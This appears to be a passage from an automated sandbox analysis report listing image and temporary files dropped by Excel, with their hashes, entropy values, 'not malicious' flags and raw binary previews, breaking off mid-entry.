Preview:	.PNG........IHDR..............T+....)iCCPicc..x..gP......}..m....T).HYz.^E...Y."bC..D..i. ...Q).+.X...X.,....."(.G.L.{'?..z.w.93..".........~....06\|G$/3........Q@.......%:&.......K....\............JJ.. ........@n..3./...f._>..L~...... ......{..T.\|ABlL..?-V...ag.......>.......W..@..+..pHK..O.....o....................w..F.......,...{....3......].xY..2....( .L..EP.-..c0.+..'p.o..P..<....C....(.........Z...B7\.kp...}..g .)x.......!"t... J.:...#...qB<.?$..@.T$..Gv"%H9R.4 -.O....r..F. ..,.'...P..D.P....\...@.qh.....{...=.v....(*D...`T..)cz..s...0,..c[.b..k..^l.{...9.3..c..8=........2p[q....I\.....7...}....x].%...........f\|'..~.?..H .X.M.9...JH$l&....:.W..I...H.!......H..XD.&."^!.....HT....L.#...H..V.e..i..D.#..-...h.&r....K.G."/Q.)..kJ.%...REi...S.S.T.....@.N.....NP?.$h:4.Z8-...v.v.....N.k...at.}/..~....I.!./.&.-.M.V.KdD.(YT].+.A4O.R...=.91.....X..V.Z..bcb...q#qo...R.V...3.D...'.h.B.c..%&..C....1v2..7.SL.S...Ld.0O3.....&.A......$.,...rc%..XgY.X_....R1R{..F.....

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\48F669AC.png Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	PNG image data, 613 x 80, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	6815
Entropy (8bit):	7.871668067811304
Encrypted:	false
SSDEEP:	96:pJzjDc7s5VhrOxAUp8Yy5196FOMVsoKZkl3p1NdBzYPx7yQgtCPe1NSMjRP9:ppDc7sk98YM19SC/27QptgtCPWkUl
MD5:	E2267BEF7933F02C009EAEFC464EB83D
SHA1:	ACFEECE4B83B30C8B38BEB4E5954B075EAF756AE
SHA-256:	BF5DF4A66D0C02D43BB4AC423D0B50831A83CDB8E8C23CF36EAC8D79383AA2A7
SHA-512:	AB1C3C23B5533C5A755CCA7FF6D8B8111577ED2823224E2E821DD517BC4E6D2B6E1353B1AFEAC6DB570A8CA1365F82CA24D5E1155C50B12556A1DF25373620FF
Malicious:	false
Preview:	.PNG........IHDR...e...P.....X.......sBIT.....O.....sRGB.........gAMA......a.....pHYs..........+......tEXtSoftware.gnome-screenshot...>....IDATx^..tT....?.$.(.C..@.Ah.Z4.g...5[Vzv.v[9.=..KOkkw......(v.b..kYJ[.]...U...T$....!.....3....y3y....$.d....y..{....}....{.{..._6p#.. .. .. ..H(......I..H..H..H..4..c.l.E.B.$@.$@.$@.$0.........O[.9e......7......"''g.Da.$@.$@.$@.$0v.x.^....{..=...3..a0\7.\|...5())...}<vIQs. .. .. .....K>].........3..K.[.nE..Q..E............._2.k...4l.)........p............eK..S..[w^..YX...4.\]]]....w.....H..H..H...E`.)..*n.\...Sw.?..O..LM...H..`F$@.$@.$@.$.4..Nv.Hh...OV......9..(.........@..L..<..ef&..;.S..=..MifD.$@.$@.$@.N#.1i..D...qO.S.....rY.oc...\|.-..X./.].].rm.V<..l..U.q>v.1.G.}h+Z"...S..r.X..S.#x...FokVv.L.&.....8. 9.3m.6@.p..8.#...\|.RiNY.+.b...E.W.8^..o....;'..\.}........\|F.8V....x.8^~.>\..S....o..j.....m..I.....B.ZN....6\b.G...X.5....Or!...m.6@......yL.>.!R.\. ...._.....7..G.i.e.......9..r..[F.r.....P4.e.k.{..@].......

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\4A5EF89A.jpeg Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	JPEG image data, JFIF standard 1.01, resolution (DPI), density 0x0, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=2], baseline, precision 8, 474x379, frames 3
Category:	dropped
Size (bytes):	7006
Entropy (8bit):	7.000232770071406
Encrypted:	false
SSDEEP:	96:X/yEpZGOnzVjPyCySpv2oNPl3ygxZzhEahqwKLBpm1hFpn:PyuZbnRW6NPl3yqEhwK1psvn
MD5:	971312D4A6C9BE9B496160215FE59C19
SHA1:	D8AA41C7D43DAAEA305F50ACF0B34901486438BE
SHA-256:	4532AEED5A1EB543882653D009593822781976F5959204C87A277887B8DEB961
SHA-512:	618B55BCD9D9533655C220C71104DFB9E2F712E56CDA7A4D3968DE45EE1861267C2D31CF74C195BF259A7151FA1F49DF4AD13431151EE28AD1D3065020CE53B5
Malicious:	false
Preview:	......JFIF..............Exif..MM.......@......../..@..................C...........................$ &%# #"(-90(6+"#2D26;=@@@&0FKE>J9?@=...C...........=)#)==================================================......{...."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..Z(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(..

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\7F6D3C08.jpeg Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	JPEG image data, JFIF standard 1.01, resolution (DPI), density 150x150, segment length 16, baseline, precision 8, 1275x1650, frames 3
Category:	dropped
Size (bytes):	85020
Entropy (8bit):	7.2472785111025875
Encrypted:	false
SSDEEP:	768:RgnqDYqspFlysF6bCd+ksds0cdAgfpS56wmdhcsp0Pxm00JkxuacpxoOlwEF3hVL:RUqQGsF6OdxW6JmPncpxoOthOip
MD5:	738BDB90A9D8929A5FB2D06775F3336F
SHA1:	6A92C54218BFBEF83371E825D6B68D4F896C0DCE
SHA-256:	8A2DB44BA9111358AFE9D111DBB4FC726BA006BFA3943C1EEBDA5A13F87DDAAB
SHA-512:	48FB23938E05198A2FE136F5E337A5E5C2D05097AE82AB943EE16BEB23348A81DA55AA030CB4ABCC6129F6EED8EFC176FECF0BEF4EC4EE6C342FC76CCDA4E8D6
Malicious:	false
Preview:	......JFIF.............C....................................................................C.......................................................................r...."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?.....(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\85D16660.jpeg Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	JPEG image data, JFIF standard 1.01, resolution (DPI), density 150x150, segment length 16, baseline, precision 8, 1275x1650, frames 3
Category:	dropped
Size (bytes):	85020
Entropy (8bit):	7.2472785111025875
Encrypted:	false
SSDEEP:	768:RgnqDYqspFlysF6bCd+ksds0cdAgfpS56wmdhcsp0Pxm00JkxuacpxoOlwEF3hVL:RUqQGsF6OdxW6JmPncpxoOthOip
MD5:	738BDB90A9D8929A5FB2D06775F3336F
SHA1:	6A92C54218BFBEF83371E825D6B68D4F896C0DCE
SHA-256:	8A2DB44BA9111358AFE9D111DBB4FC726BA006BFA3943C1EEBDA5A13F87DDAAB
SHA-512:	48FB23938E05198A2FE136F5E337A5E5C2D05097AE82AB943EE16BEB23348A81DA55AA030CB4ABCC6129F6EED8EFC176FECF0BEF4EC4EE6C342FC76CCDA4E8D6
Malicious:	false
Preview:	......JFIF.............C....................................................................C.......................................................................r...."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?.....(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\9D207B6E.jpeg Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 333x151, frames 3
Category:	dropped
Size (bytes):	14198
Entropy (8bit):	7.916688725116637
Encrypted:	false
SSDEEP:	384:lboF1PuTfwKCNtwsU9SjUB7ShYIv7JrEHaeHj7KHG81I:lboFgwK+wD9SA7ShX7JrEL7KHG8S
MD5:	E8FC908D33C78AAAD1D06E865FC9F9B0
SHA1:	72CA86D260330FC32246D28349C07933E427065D
SHA-256:	7BB11564F3C6C559B3AC8ADE3E5FCA1D51F5451AFF5C522D70C3BACEC0BBB5D0
SHA-512:	A005677A2958E533A51A95465308F94BE173F93264A2A3DB58683346CA97E04F14567D53D0066C1EAA33708579CD48B8CD3F02E1C54F126B7F3C4E64AC196E17
Malicious:	false
Preview:	......JFIF.................................... .... !....!..!) ..&.".#1!&)+... "383-7(-.-...........-...------0--------+-------------------+--------------........M..".......................................E......................!...1A"Q.aq..2B..#R..3b...$r..C......4DSTcs..................................................Q.A............?...f.t..Q ]....i".G.2....}....m..D..."......Z.5..5...CPL..W..o7....h.u..+.B...R.S.I. ..m...8.T...(.YX.St.@r..ca...\|5.2.....%..R.A67.........{....X.;...4.D.o'..R...sV8....rJm....2Est-.......U.@......\|j.4.mn..Ke!G.6PJ.S>..0....q%..... .....@...T.P.<...q.z.e....((H+. ..@$...'..?..h.P.]...ZP.H..l?s2l.$.N..?xP..c...@....A..D.l......1...[q[5(-.J..@...$..N....x.U.fHY!..PM..[.P........aY.....S.R.....Y...(D.\|..10........... ..l..\|F...E9...RU:.P...p$.'......2.s.-....a&.@..P.....m..........L.a.H;Dv)...@u...s.,.h..6..Y,....D.7....,.UHe.s..PQ.Ym....)..(y.6.u...i.V.'2`....&.... ^...8.+]K)R...\.'A...I..B..?[.:.L(c3J..%..$.3..E0@...."5fj...

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\BEC4B86A.emf Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	Windows Enhanced Metafile (EMF) image data version 0x10000
Category:	dropped
Size (bytes):	648132
Entropy (8bit):	2.8123732035585567
Encrypted:	false
SSDEEP:	3072:s34UL0tS6WB0JOqFB5AEA7rgXuzqn8nG/qc+5:e4UcLe0JOcXuunhqcS
MD5:	BA69715E6EB54DCEED5B1507537588A9
SHA1:	87833A16EC09B976C107F225E66B68B52E6A40A6
SHA-256:	9D7AA7153D914458F4FB697A092F57D6725C1FDBC5086991DF200642355211AE
SHA-512:	A726ED7A59CE51C6BF9ADED36634FDE236C40B3F414165B7FADE0AEBF172F50D7A17F273F572EF5BADFC24DFFC91D9C33EAACA7380E632BC04CB6F555E068B92
Malicious:	false
Preview:	....l...........................m>...!.. EMF........(...............................................\K..hC..F...,... ...EMF+.@..................X...X...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@......................................................%...........%...................................R...p................................@."C.a.l.i.b.r.i......................................................Z$...p...f.Z.@..%...L............t..RQt[..........\.....$Qt[...... ...Id.Z...... .........'..d.Z............O...........................%...X...%...7...................{$..................C.a.l.i.b.r.i..............X...... ...8.Z......'.dv......%...........%...........%...........!..............................."...........%...........%...........%...........T...T..........................@.E.@............L.......................P... ...6...F...$.......EMF+@..$..........?...........?.........@...........@..........@..$..........?....

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\CA746F1B.png Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	PNG image data, 566 x 429, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	84203
Entropy (8bit):	7.979766688932294
Encrypted:	false
SSDEEP:	1536:RrpoeM3WUHO25A8HD3So4lL9jvtO63O2l/Wr9nuQvs+9QvM4PmgZuVHdJ5v3ZK7+:H5YHOhwx4lRTtO6349uQvXJ4PmgZu11J
MD5:	208FD40D2F72D9AED77A86A44782E9E2
SHA1:	216B99E777ED782BDC3BFD1075DB90DFDDABD20F
SHA-256:	CBFDB963E074C150190C93796163F3889165BF4471CA77C39E756CF3F6F703FF
SHA-512:	7BCE80FFA8B0707E4598639023876286B6371AE465A9365FA21D2C01405AB090517C448514880713CA22875013074DB9D5ED8DA93C223F265C179CFADA609A64
Malicious:	false
Preview:	.PNG........IHDR...6...........>(....sRGB.........gAMA......a.....pHYs..........+......IDATx^.=v\9..H..f...:ZA..,'..j.r4.........SEJ,%..VPG..K.=....@.$oI.e7....U...... ....>n~&..._..._.rg....L...D.G!0..G!;...?...Oo.7....Cc...G....g>......_o..._._.}q...k.....ru..T.....S.!....~..@Y96.S.....&..1.:....o...q.6..S...'n..H.hS......y;.N.l.)."[ `.f.X.u.n.;........._h.(.u\|0a.....].R.z...2......GJY\|\..+b...{>vU.....i...........w+.p...X..._.V.-z..s..U..cR..g^..X......6n...6....O6.-.AM.f.=y ...7...;X....q..\|...=.\|K...w...}O..{\|...G........~.o3.....z....m6...sN.0..;/....Y..H..o............~........(W.`...S.t......m....+.K...<..M=...IN.U..C..].5.=...s..g.d..f.<Km..$..fS...o..:..}@...;k..m.L./.$......,}....3%..\|j.....b.r7.O!F...c'......$...)....\|O.CK...._......Nv....q.t3l.,. ....vD.-..o..k.w.....X...-C..KGld.8.a}\|..,.....,....q.=r..Pf.V#.....n...}........[w...N.b..W......;..?.Oq..K{>.K.....{w{.......6'/...,.}.E...X.I.-Y].JJm.j..pq\|.0...e.v......17...:F

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\D48A6F02.jpeg Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	JPEG image data, JFIF standard 1.01, resolution (DPI), density 0x0, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=2], baseline, precision 8, 474x379, frames 3
Category:	dropped
Size (bytes):	7006
Entropy (8bit):	7.000232770071406
Encrypted:	false
SSDEEP:	96:X/yEpZGOnzVjPyCySpv2oNPl3ygxZzhEahqwKLBpm1hFpn:PyuZbnRW6NPl3yqEhwK1psvn
MD5:	971312D4A6C9BE9B496160215FE59C19
SHA1:	D8AA41C7D43DAAEA305F50ACF0B34901486438BE
SHA-256:	4532AEED5A1EB543882653D009593822781976F5959204C87A277887B8DEB961
SHA-512:	618B55BCD9D9533655C220C71104DFB9E2F712E56CDA7A4D3968DE45EE1861267C2D31CF74C195BF259A7151FA1F49DF4AD13431151EE28AD1D3065020CE53B5
Malicious:	false
Preview:	......JFIF..............Exif..MM.......@......../..@..................C...........................$ &%# #"(-90(6+"#2D26;=@@@&0FKE>J9?@=...C...........=)#)==================================================......{...."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..Z(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(..

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\DB3F3C69.jpeg Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 191x263, frames 3
Category:	dropped
Size (bytes):	8815
Entropy (8bit):	7.944898651451431
Encrypted:	false
SSDEEP:	192:Qjnr2Il8e7li2YRD5x5dlyuaQ0ugZIBn+0O2yHQGYtPto:QZl8e7li2YdRyuZ0b+JGgtPW
MD5:	F06432656347B7042C803FE58F4043E1
SHA1:	4BD52B10B24EADECA4B227969170C1D06626A639
SHA-256:	409F06FC20F252C724072A88626CB29F299167EAE6655D81DF8E9084E62D6CF6
SHA-512:	358FEB8CBFFBE6329F31959F0F03C079CF95B494D3C76CF3669D28CA8CDB42B04307AE46CED1FC0605DEF31D9839A0283B43AA5D409ADC283A1CAD787BE95F0E
Malicious:	false
Preview:	......JFIF...................................................) ..(...!1!%)-.....383,7(..,...........+...7++++-+++++++++++++++---++++++++-+++++++++++++++++...........".......................................F........................!."1A..QRa.#2BSq......3b.....$c....C...Er.5.........................................................?..x.5.PM.Q@E..I......i..0.$G.C...h..Gt....f..O..U..D.t^...u.B...V9.f..<..t(.kt...d.@...&3)d@@?.q...t..3!.... .9.r.....Q.(:.W..X&..&.1&T..K..\|kc.....[..l.3(f+.c...:+....5....hHR.0....^R.G..6...&pB..d.h.04.+..S...M........[....'......J...,...<.O.........Yn...T.!..E*G.[I..-.......$e&........z..[..3.+~..a.u9d.&9K.xkX'.."...Y...l.......MxPu..b..:0e:.R.#.......U....E...4Pd/..0.`.4 ...A...t.....2....gb[)b.I."&..y1..........l.s>.ZA?..........3... z^....L.n6..Am.1m....0../..~.y......1.b.0U...5.oi.\.LH1.f....sl................f.'3?...bu.P4>...+..B....eL....R.,...<....3.0O$,=..K.!....Z.......O.I.z....am....C.k..iZ ...<ds....f8f..R....K

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\E4E9FBD3.png Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	PNG image data, 566 x 429, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	84203
Entropy (8bit):	7.979766688932294
Encrypted:	false
SSDEEP:	1536:RrpoeM3WUHO25A8HD3So4lL9jvtO63O2l/Wr9nuQvs+9QvM4PmgZuVHdJ5v3ZK7+:H5YHOhwx4lRTtO6349uQvXJ4PmgZu11J
MD5:	208FD40D2F72D9AED77A86A44782E9E2
SHA1:	216B99E777ED782BDC3BFD1075DB90DFDDABD20F
SHA-256:	CBFDB963E074C150190C93796163F3889165BF4471CA77C39E756CF3F6F703FF
SHA-512:	7BCE80FFA8B0707E4598639023876286B6371AE465A9365FA21D2C01405AB090517C448514880713CA22875013074DB9D5ED8DA93C223F265C179CFADA609A64
Malicious:	false
Preview:	.PNG........IHDR...6...........>(....sRGB.........gAMA......a.....pHYs..........+......IDATx^.=v\9..H..f...:ZA..,'..j.r4.........SEJ,%..VPG..K.=....@.$oI.e7....U...... ....>n~&..._..._.rg....L...D.G!0..G!;...?...Oo.7....Cc...G....g>......_o..._._.}q...k.....ru..T.....S.!....~..@Y96.S.....&..1.:....o...q.6..S...'n..H.hS......y;.N.l.)."[ `.f.X.u.n.;........._h.(.u\|0a.....].R.z...2......GJY\|\..+b...{>vU.....i...........w+.p...X..._.V.-z..s..U..cR..g^..X......6n...6....O6.-.AM.f.=y ...7...;X....q..\|...=.\|K...w...}O..{\|...G........~.o3.....z....m6...sN.0..;/....Y..H..o............~........(W.`...S.t......m....+.K...<..M=...IN.U..C..].5.=...s..g.d..f.<Km..$..fS...o..:..}@...;k..m.L./.$......,}....3%..\|j.....b.r7.O!F...c'......$...)....\|O.CK...._......Nv....q.t3l.,. ....vD.-..o..k.w.....X...-C..KGld.8.a}\|..,.....,....q.=r..Pf.V#.....n...}........[w...N.b..W......;..?.Oq..K{>.K.....{w{.......6'/...,.}.E...X.I.-Y].JJm.j..pq\|.0...e.v......17...:F

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\F9921897.png Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	PNG image data, 476 x 244, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	49744
Entropy (8bit):	7.99056926749243
Encrypted:	true
SSDEEP:	768:wnuJ6p14x3egT1LYye1wBiPaaBsZbkCev17dGOhRkJjsv+gZB/UcVaxZJ2LEz:Yfp1UeWNYF1UiPm+/q1sxZB/ZS
MD5:	63A6CB15B2B8ECD64F1158F5C8FBDCC8
SHA1:	8783B949B93383C2A5AF7369C6EEB9D5DD7A56F6
SHA-256:	AEA49B54BA0E46F19E04BB883DA311518AF3711132E39D3AF143833920CDD232
SHA-512:	BB42A40E6EADF558C2AAE82F5FB60B8D3AC06E669F41B46FCBE65028F02B2E63491DB40E1C6F1B21A830E72EE52586B83A24A055A06C2CCC2D1207C2D5AD6B45
Malicious:	false
Preview:	.PNG........IHDR..............I.M....IDATx....T.]...G.;..nuww7.s...U..K......Ih....q!i...K....t.'k.W..i..>.......B.....E.0....f.a.....e....++...P..\|..^...L.S}r:..............sM....p..p-..y]...t7'.D)....../...k....pzos.......6;,..H.....U..a..9..1...$.......kI<..\F...$.E....?[B(.9.....H..!.....0AV..g.m...23..C..g(.%...6..>.O.r...L..t1.Q-.bE......)........\|i ..."....V.g.\.G..p..p.X[.....%hyt...@..J...~.p.....\|..>...~.`..E_....iU.G...i.O..r6...iV.....@..........Jte...5Q.P.v;..B.C...m......0.N......q...b.....Q...c.moT.e6OB...p.v"...."........9..G....B}...../m...0g...8......6.$.$]p...9.....Z.a.sr.;B.a....m...>...b..B..K...{...+w?....B3...2...>.......1..-.'.l.p........L....\.K..P.q......?>..fd.`w..y..\|y..,.....i..'&.?.....).e.D ?.06......U.%.2t........6.:..D.B....+~.....M%".fG]b\.[........1....".......GC6.....J.+......r.a...ieZ..j.Y...3..Q*m.r.urb.5@.e.v@@....gsb.{q-..3j........s.f.\|8s$p.?3H......0`..6)...bD....^..+....9..;$...W::.jBH..!tK

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\mso4138.tmp Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	PC bitmap, Windows 3.x format, 20 x 20 x 24
Category:	dropped
Size (bytes):	1254
Entropy (8bit):	5.835900066445133
Encrypted:	false
SSDEEP:	24:qEnXJZiYfAzWGWCZGw3jW5uyPBPcemkGFM3JJJJJOm6JJJJJZEoJJJJJuRl6JJJt:znXJLA7TjGRc3M3JJJJJOm6JJJJJuoJ3
MD5:	A3C62E516777C15BF216F12143693C61
SHA1:	277BFA1F59B59276EF52EF39AE26D4DD3BDB285F
SHA-256:	616F688DE9FC058BCD3FD414C3B49473AB0923EB06479EDA252E351895760408
SHA-512:	AA2E51951CF7D51FC8E5F24D49403A9C3EE83E57E6080BF5FBDAB73D77020054B561D9B733BC60366B5E2A2F5570650052BFD5196196EFA24EF3E26247D3ADF2
Malicious:	false
Preview:	BM........6...(..............................................}l.lXvaLvaLvaLvaLvaLvaLvaLvaLvaLvaLvaLvaLvaLvaLvaLvaL.........................................................vaL.........................................................vaL.........................................................vaL..........{..{..{..{..{..{..{..{..{..{..{..{..{..{..{...vaL..........................u........}.z.i......vaL......................x....}............]......vaL.....................{.............w........vaL.................~.............w.........vaL.........................................vaL.........................................vaL......................................................vaL......................................................vaL......................................................vaL......................................................vaL.............................................

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\mso4167.tmp Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	PC bitmap, Windows 3.x format, 20 x 20 x 24
Category:	dropped
Size (bytes):	1254
Entropy (8bit):	5.835900066445133
Encrypted:	false
SSDEEP:	24:qEnXJZiYfAzWGWCZGw3jW5uyPBPcemkGFM3JJJJJOm6JJJJJZEoJJJJJuRl6JJJt:znXJLA7TjGRc3M3JJJJJOm6JJJJJuoJ3
MD5:	A3C62E516777C15BF216F12143693C61
SHA1:	277BFA1F59B59276EF52EF39AE26D4DD3BDB285F
SHA-256:	616F688DE9FC058BCD3FD414C3B49473AB0923EB06479EDA252E351895760408
SHA-512:	AA2E51951CF7D51FC8E5F24D49403A9C3EE83E57E6080BF5FBDAB73D77020054B561D9B733BC60366B5E2A2F5570650052BFD5196196EFA24EF3E26247D3ADF2
Malicious:	false
Preview:	BM........6...(..............................................}l.lXvaLvaLvaLvaLvaLvaLvaLvaLvaLvaLvaLvaLvaLvaLvaLvaL.........................................................vaL.........................................................vaL.........................................................vaL..........{..{..{..{..{..{..{..{..{..{..{..{..{..{..{...vaL..........................u........}.z.i......vaL......................x....}............]......vaL.....................{.............w........vaL.................~.............w.........vaL.........................................vaL.........................................vaL......................................................vaL......................................................vaL......................................................vaL......................................................vaL.............................................

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\mso4168.tmp Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	PC bitmap, Windows 3.x format, 20 x 20 x 24
Category:	dropped
Size (bytes):	1254
Entropy (8bit):	5.835900066445133
Encrypted:	false
SSDEEP:	24:qEnXJZiYfAzWGWCZGw3jW5uyPBPcemkGFM3JJJJJOm6JJJJJZEoJJJJJuRl6JJJt:znXJLA7TjGRc3M3JJJJJOm6JJJJJuoJ3
MD5:	A3C62E516777C15BF216F12143693C61
SHA1:	277BFA1F59B59276EF52EF39AE26D4DD3BDB285F
SHA-256:	616F688DE9FC058BCD3FD414C3B49473AB0923EB06479EDA252E351895760408
SHA-512:	AA2E51951CF7D51FC8E5F24D49403A9C3EE83E57E6080BF5FBDAB73D77020054B561D9B733BC60366B5E2A2F5570650052BFD5196196EFA24EF3E26247D3ADF2
Malicious:	false
Preview:	BM........6...(..............................................}l.lXvaLvaLvaLvaLvaLvaLvaLvaLvaLvaLvaLvaLvaLvaLvaLvaL.........................................................vaL.........................................................vaL.........................................................vaL..........{..{..{..{..{..{..{..{..{..{..{..{..{..{..{...vaL..........................u........}.z.i......vaL......................x....}............]......vaL.....................{.............w........vaL.................~.............w.........vaL.........................................vaL.........................................vaL......................................................vaL......................................................vaL......................................................vaL......................................................vaL.............................................

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\msoF0B5.tmp Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	PC bitmap, Windows 3.x format, 20 x 20 x 24
Category:	dropped
Size (bytes):	1254
Entropy (8bit):	5.835900066445133
Encrypted:	false
SSDEEP:	24:qEnXJZiYfAzWGWCZGw3jW5uyPBPcemkGFM3JJJJJOm6JJJJJZEoJJJJJuRl6JJJt:znXJLA7TjGRc3M3JJJJJOm6JJJJJuoJ3
MD5:	A3C62E516777C15BF216F12143693C61
SHA1:	277BFA1F59B59276EF52EF39AE26D4DD3BDB285F
SHA-256:	616F688DE9FC058BCD3FD414C3B49473AB0923EB06479EDA252E351895760408
SHA-512:	AA2E51951CF7D51FC8E5F24D49403A9C3EE83E57E6080BF5FBDAB73D77020054B561D9B733BC60366B5E2A2F5570650052BFD5196196EFA24EF3E26247D3ADF2
Malicious:	false
Preview:	BM........6...(..............................................}l.lXvaLvaLvaLvaLvaLvaLvaLvaLvaLvaLvaLvaLvaLvaLvaLvaL.........................................................vaL.........................................................vaL.........................................................vaL..........{..{..{..{..{..{..{..{..{..{..{..{..{..{..{...vaL..........................u........}.z.i......vaL......................x....}............]......vaL.....................{.............w........vaL.................~.............w.........vaL.........................................vaL.........................................vaL......................................................vaL......................................................vaL......................................................vaL......................................................vaL.............................................

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\msoF0B6.tmp Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	PC bitmap, Windows 3.x format, 20 x 20 x 24
Category:	dropped
Size (bytes):	1254
Entropy (8bit):	5.835900066445133
Encrypted:	false
SSDEEP:	24:qEnXJZiYfAzWGWCZGw3jW5uyPBPcemkGFM3JJJJJOm6JJJJJZEoJJJJJuRl6JJJt:znXJLA7TjGRc3M3JJJJJOm6JJJJJuoJ3
MD5:	A3C62E516777C15BF216F12143693C61
SHA1:	277BFA1F59B59276EF52EF39AE26D4DD3BDB285F
SHA-256:	616F688DE9FC058BCD3FD414C3B49473AB0923EB06479EDA252E351895760408
SHA-512:	AA2E51951CF7D51FC8E5F24D49403A9C3EE83E57E6080BF5FBDAB73D77020054B561D9B733BC60366B5E2A2F5570650052BFD5196196EFA24EF3E26247D3ADF2
Malicious:	false
Preview:	BM........6...(..............................................}l.lXvaLvaLvaLvaLvaLvaLvaLvaLvaLvaLvaLvaLvaLvaLvaLvaL.........................................................vaL.........................................................vaL.........................................................vaL..........{..{..{..{..{..{..{..{..{..{..{..{..{..{..{...vaL..........................u........}.z.i......vaL......................x....}............]......vaL.....................{.............w........vaL.................~.............w.........vaL.........................................vaL.........................................vaL......................................................vaL......................................................vaL......................................................vaL......................................................vaL.............................................

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\msoF0B7.tmp Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	PC bitmap, Windows 3.x format, 20 x 20 x 24
Category:	dropped
Size (bytes):	1254
Entropy (8bit):	5.835900066445133
Encrypted:	false
